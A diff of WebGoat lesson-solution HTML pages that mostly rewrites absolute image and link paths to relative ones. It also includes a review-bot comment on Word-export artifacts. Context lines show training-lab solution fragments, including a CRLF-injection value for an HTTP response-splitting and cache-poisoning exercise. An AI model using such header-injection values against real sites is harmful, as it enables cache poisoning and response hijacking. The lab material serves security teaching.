</v:shapetype><v:shape id="Picture_x0020_38" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image011.jpg" v:shapes="Picture_x0020_38"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image011.jpg" v:shapes="Picture_x0020_38"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -579,9 +579,9 @@ the page and select "View source"<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_39"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:269.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image003.png" o:title="" cropbottom="4255f"/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image003.png" o:title="" cropbottom="4255f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=359
src="/WebGoat/lesson_solutions/HtmlClues_files/image012.jpg" v:shapes="Picture_x0020_39"><![endif]></span></p>
src="lesson_solutions/HtmlClues_files/image012.jpg" v:shapes="Picture_x0020_39"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -607,9 +607,9 @@ HTML source.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_40" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image013.jpg" v:shapes="Picture_x0020_40"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image013.jpg" v:shapes="Picture_x0020_40"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -624,9 +624,9 @@ adminpw. Enter these values in WebGoat and click "Login"<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_41"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image014.jpg" v:shapes="Picture_x0020_41"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image014.jpg" v:shapes="Picture_x0020_41"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -643,9 +643,9 @@ style='font-family:"Arial","sans-serif"'> Enter discovered credentials<o:p></o:p
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_42"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HtmlClues_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HtmlClues_files/image015.jpg" v:shapes="Picture_x0020_42"><![endif]></span><span
src="lesson_solutions/HtmlClues_files/image015.jpg" v:shapes="Picture_x0020_42"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HttpBasics_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpBasics_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HttpBasics_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpBasics_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HttpBasics_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpBasics_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HttpBasics_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HttpBasics_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -565,7 +565,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".<o:p></o:p></span></p>
<img src="/WebGoat/lesson_solutions/HttpBasics_files/webscarab1.jpg">
<img src="lesson_solutions/HttpBasics_files/webscarab1.jpg">
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -581,7 +581,7 @@ name and click the button Go! We get a new WebScarab window, where we can find t
<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<img src="/WebGoat/lesson_solutions/HttpBasics_files/webscarab2.jpg">
<img src="lesson_solutions/HttpBasics_files/webscarab2.jpg">
<p class=MsoNormal><span style='font-size:8.0pt;font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HttpOnly_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpOnly_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HttpOnly_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpOnly_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HttpOnly_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpOnly_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HttpOnly_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HttpOnly_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -693,9 +693,9 @@ style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_115" o:spid="_x0000_i1032" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpOnly_files/image015.jpg" v:shapes="Picture_x0020_115"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image015.jpg" v:shapes="Picture_x0020_115"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -722,9 +722,9 @@ normal'><o:p>&nbsp;</o:p></b></p>
style='mso-bidi-font-weight:normal'><span style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_117" o:spid="_x0000_i1031" type="#_x0000_t75" style='width:427.5pt;
height:94.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=570 height=126
src="/WebGoat/lesson_solutions/HttpOnly_files/image016.jpg" v:shapes="Picture_x0020_117"><![endif]></span></b></p>
src="lesson_solutions/HttpOnly_files/image016.jpg" v:shapes="Picture_x0020_117"><![endif]></span></b></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -745,9 +745,9 @@ WebScarab.<o:p></o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_118" o:spid="_x0000_i1030" type="#_x0000_t75" style='width:481.5pt;
height:344.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpOnly_files/image017.jpg" v:shapes="Picture_x0020_118"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image017.jpg" v:shapes="Picture_x0020_118"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ
@ -761,9 +761,9 @@ field-end'></span><![endif]--> HTTP Request</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_119"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpOnly_files/image018.jpg" v:shapes="Picture_x0020_119"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image018.jpg" v:shapes="Picture_x0020_119"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -783,9 +783,9 @@ on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.<o:p><
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_120"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:254.25pt;height:94.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=339 height=126
src="/WebGoat/lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_120"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_120"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -799,9 +799,9 @@ style='mso-element:field-end'></span><![endif]--> Only JSESSIONID</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_116"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpOnly_files/image020.jpg" v:shapes="Picture_x0020_116"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image020.jpg" v:shapes="Picture_x0020_116"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ
@ -820,9 +820,9 @@ on
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_121" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:254.25pt;
height:94.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=339 height=126
src="/WebGoat/lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_121"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image019.jpg" v:shapes="Picture_x0020_121"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -836,9 +836,9 @@ style='mso-element:field-end'></span><![endif]--> JSESSIONID cookie</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_122"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpOnly_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpOnly_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpOnly_files/image021.jpg" v:shapes="Picture_x0020_122"><![endif]></span></p>
src="lesson_solutions/HttpOnly_files/image021.jpg" v:shapes="Picture_x0020_122"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
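Review bot: The `<link rel=File-List ...filelist.xml>`, `<link rel=Edit-Time-Data ...editdata.mso>`, `<link rel=themeData ...>` and `<link rel=colorSchemeMapping ...>` elements in the first two hunks are Word-export artifacts that no browser renders; keeping them live means the page still requests `editdata.mso` and `filelist.xml`, which carry authoring metadata rather than anything shown to the learner, and each is one more document-relative URL that has to resolve correctly. Since the commit already rewrites every one of these hrefs, I would delete the four `<link>` elements instead and keep only the `img`/`v:imagedata` references the page actually displays. Those image references now resolve against the URL of the page that embeds this fragment rather than against the deployed context path, so they are correct only while the solution is rendered inline directly under the context root; I cannot see the embedding code from here, so that is an assumption to verify. A one-line note at the top of the file, `<!-- resource paths are relative to the WebGoat context root; rendered inline by the attack page, not served directly -->`, would save the next person who serves this file by its own URL from wondering why every image 404s.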


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HttpSplitting_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpSplitting_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HttpSplitting_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HttpSplitting_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HttpSplitting_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpSplitting_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HttpSplitting_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HttpSplitting_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -725,9 +725,9 @@ exploited successfully you will find the green check in the left menu.<o:p></o:p
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_159" o:spid="_x0000_i1038" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
@ -756,9 +756,9 @@ requests and responses?<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_160"
o:spid="_x0000_i1037" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -770,9 +770,9 @@ field-end'></span><![endif]--> Language en</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_161" o:spid="_x0000_i1036"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -786,9 +786,9 @@ field-end'></span><![endif]--> HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_162" o:spid="_x0000_i1035"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -802,9 +802,9 @@ field-end'></span><![endif]--> First HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_163" o:spid="_x0000_i1034"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image033.jpg" v:shapes="Picture_x0020_163"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -823,9 +823,9 @@ for the language en%0d%0a%0d%0a%0d%0a<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_164"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image034.jpg" v:shapes="Picture_x0020_164"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -839,9 +839,9 @@ field-end'></span><![endif]--> First HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_165" o:spid="_x0000_i1032"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image035.jpg" v:shapes="Picture_x0020_165"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -872,9 +872,9 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ht
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_166"
o:spid="_x0000_i1031" type="#_x0000_t75" style='width:481.5pt;height:344.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image036.jpg" v:shapes="Picture_x0020_166"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -888,9 +888,9 @@ field-end'></span><![endif]--> HTTP Splitting attack</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_167" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image017.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image037.jpg" v:shapes="Picture_x0020_167"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -904,9 +904,9 @@ field-end'></span><![endif]--> HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_168" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image019.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image038.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -920,9 +920,9 @@ field-end'></span><![endif]--> Second HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image021.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=459
src="/WebGoat/lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image039.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -936,9 +936,9 @@ style='mso-element:field-end'></span><![endif]--> Second HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image023.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image040.jpg" v:shapes="Picture_x0020_170"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -957,9 +957,9 @@ button of your browser.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image025.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image041.jpg" v:shapes="Picture_x0020_171"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -991,9 +991,9 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'>&lt;/ht
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_172" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
<v:imagedata src="lesson_solutions/HttpSplitting_files/image027.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
src="lesson_solutions/HttpSplitting_files/image042.jpg" v:shapes="Picture_x0020_172"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -1009,7 +1009,7 @@ style='mso-element:field-end'></span><![endif]--> Inject cache poisoning</p>
<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
Solution by Erwin Geirnaert
</td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='/WebGoat/images/logos/zionsecurity.gif'></td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
</tr>
